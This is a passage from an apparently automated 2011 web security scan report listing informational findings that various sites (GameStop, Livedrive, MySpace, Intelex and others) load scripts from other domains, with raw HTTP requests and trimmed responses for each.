Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgH7tQ64GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--7382d0abaaf72a07ec28bc0ebd8430ba3e768e1a; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 41554
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</div>


<script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script>
...[SNIP]...

21.75. http://www.fansnap.com/developers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fansnap.com
Path:   /developers

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /developers HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/about
Cookie: ver=1; vid=1342567440282625; tvid=1342567440282625; _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgL58u68GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--5b44033c581130d6faa8811aaffe669fa3974944; POOLID=B; __utma=19633071.1263508421.1311101027.1311101027.1311101027.1; __utmb=19633071; __utmc=19633071; __utmz=19633071.1311101027.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; lvd=1311101038

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:44:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 14
ETag: "bfa7ab1f3b81c2b865b63d6a30d3b74a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgE5q87AGOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--d9a3777cedf14b19a925974c0f762f2ddc6ee6dd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12059
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</div>


<script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script>
...[SNIP]...

21.76. http://www.fastteks.com/TechSolutions/News.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastteks.com
Path:   /TechSolutions/News.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /TechSolutions/News.aspx HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.4.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:03:42 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 399254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<div id="ctl00_ContentWindow_MainContentRegion_MainRegionId">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1">
       </script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

21.77. http://www.gamestop.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:02:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:25 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,3375,4265,4151,4287,4300,3852,3362,4228,4227,4226,3383; path=/
Set-Cookie: CactusState=V=1; path=/
Content-Length: 317495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<!--/*AudienceScience JS*/--> <script src="//js.revsci.net/gateway/gw.js?csid=C07583&auto=t"></script>
...[SNIP]...

21.78. http://www.googlelabs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googlelabs.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.googlelabs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Content-Language: en-us
Date: Tue, 19 Jul 2011 20:49:41 GMT
Server: Google Frontend
Content-Length: 47646

<!DOCTYPE html>
<html lang="en-US">

<head>
<script type="text/javascript">(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};thi
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.79. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelex.com
Path:   /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w HTTP/1.1
Host: www.intelex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 98253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d77db2f6ef335f7"></script>
...[SNIP]...
</script>


<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

21.80. http://www.intelex.com/landing/~/script/highslide/highslide.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelex.com
Path:   /landing/~/script/highslide/highslide.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /landing/~/script/highslide/highslide.css HTTP/1.1
Host: www.intelex.com
Proxy-Connection: keep-alive
Referer: http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gflees54rii1f3o3ejpcx3m0

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34055


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d77db2f6ef335f7"></script>
...[SNIP]...
</script>


<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

21.81. http://www.livedrive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedrive.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; market=US; __utmz=9305512.1308880525.1.1.utmcsr=livedrive.com|utmccn=(referral)|utmcmd=referral|utmcct=/Login; __utma=9305512.1214018352.1308880525.1308880525.1308880525.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:24:13 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 103
Date: Tue, 19 Jul 2011 12:24:12 GMT
Connection: close
Content-Length: 18913


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
   Online Storage & Onli
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

21.82. http://www.livedrive.com/ForHome/ProSuite  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedrive.com
Path:   /ForHome/ProSuite

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ForHome/ProSuite HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; market=US; __utma=1.1954624592.1311078246.1311078246.1311078246.1; __utmb=1.1.10.1311078246; __utmc=1; __utmz=1.1311078246.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rotateProductNavPane=7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:23:11 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:23:11 GMT
Connection: close
Content-Length: 25322


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
   Livedrive Pro suite-
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

21.83. http://www.livedrive.com/SignupToLivedrive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedrive.com
Path:   /SignupToLivedrive

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SignupToLivedrive?market=US HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/ForHome/ProSuite
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; rotateProductNavPane=7; market=US; __utma=1.1954624592.1311078246.1311078246.1311078246.1; __utmb=1.2.10.1311078246; __utmc=1; __utmz=1.1311078246.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:23:33 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:23:33 GMT
Connection: close
Content-Length: 19197


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
   Sign up for Livedrive
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

21.84. http://www.mavitunasecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mavitunasecurity.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.mavitunasecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11213
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:39:25 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><title>
   N
...[SNIP]...
</script>
   <script src="//static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/v2.1/zenbox.js"></script>
...[SNIP]...

21.85. http://www.mavitunasecurity.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mavitunasecurity.com
Path:   /blog/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/ HTTP/1.1
Host: www.mavitunasecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: msluuid=c326121b79864f4280400de74b423212; _jsuid=6701577914079939982; __utma=97172739.129174214.1311089909.1311089909.1311089909.1; __utmb=97172739.6.10.1311089909; __utmc=97172739; __utmz=97172739.1311089909.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22924
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:39:58 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><title>
   Netsparker, F
...[SNIP]...
</script>
   <script src="//static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/v2.1/zenbox.js"></script>
...[SNIP]...

21.86. http://www.myspace.com/auth/loginform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /auth/loginform

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fl%3d3%26u%3dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fprivateequity%26t%3dPrivate%2bEquity%252C%2bVenture%2bCapital%252C%2bOwnership%252C%2bM%2526A%252C%2bIdea%2bScreening%252C%2bReporting%2b%257C%2bFactSet%2bResearch%2bSystems%26c%3d%253Cp%253EPowered%2bby%2b%253Ca%2bhref%253D%2522http%253A%252F%252Fsharethis.com%2522%253EShareThis%253C%252Fa%253E%253C%252Fp%253E HTTP/1.1
Host: www.myspace.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634466573070107947&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; SessionDDF2=uVsidkC9gs9LxsRzCwBpAqNpUhZIkNkh4AxUscS1Wh/5D61/I2xWndq6Yq1d3SssDjs2CU1kxAVylC6iru8MRA==

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Server: 58f11280d72c42fc4512638736510b7130783a7e53b4cdad
X-AspNet-Version: 4.0.30319
Set-Cookie: MSCOUNTRY=US; domain=.myspace.com; expires=Tue, 26-Jul-2011 14:30:19 GMT; path=/
X-PoweredBy: Just our Will
Date: Tue, 19 Jul 2011 14:30:19 GMT
Content-Length: 11278
X-Vertical: globalsites

<!DOCTYPE html>
<html class="noJS en-US">
<!-- LoginForm -->
<head>
<script type="text/javascript">
   (function (wl, his) {var m = wl.href.match(/([?&]_escaped_fragment_=|#!(?=\/))([^&#]*)/);if (!
...[SNIP]...
</script><script type="text/javascript" src="http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js"></script>
<script type="text/javascript" src="http://cms.myspacecdn.com/cms/js/ad_wrapper0189.js"></script>

   <script type="text/javascript" src="http://js.myspacecdn.com/modules/login/static/js/externalloginbundle_xbaqfwap.js"></script>
...[SNIP]...

21.87. http://www.nne.aaa.com/en-nne/Pages/Home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nne.aaa.com
Path:   /en-nne/Pages/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:25 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: acezipcode=36|AAA|05672; expires=Thu, 19-Jul-2012 19:04:24 GMT; path=/
Cache-Control: private
Expires: Tue, 19 Jul 2011 19:07:25 GMT
Vary: *, Accept-Encoding, User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 97400


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<
...[SNIP]...
<!-- ConvergeTrack Landing Pixel Code -->
<script type="text/javascript" src="//hits.convergetrack.com/Includes/CT.js"></script>
...[SNIP]...

21.88. http://www.numarasoftware.com/welcome/service_desk.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.numarasoftware.com
Path:   /welcome/service_desk.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /welcome/service_desk.aspx?src=google&trm=issue_tracking_software HTTP/1.1
Host: www.numarasoftware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:24 GMT
Content-Length: 66115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="html" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/assets/css/landing.css" media="all" />
   <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...

21.89. http://www.seapine.com/ttpro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seapine.com
Path:   /ttpro.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ttpro.html?utm_source=GoogleAdwords&utm_campaign=BugTrackingAdgroup&utm_medium=Search&utm_content= HTTP/1.1
Host: www.seapine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SourceKey=201107191020391579

Response

HTTP/1.1 200 OK
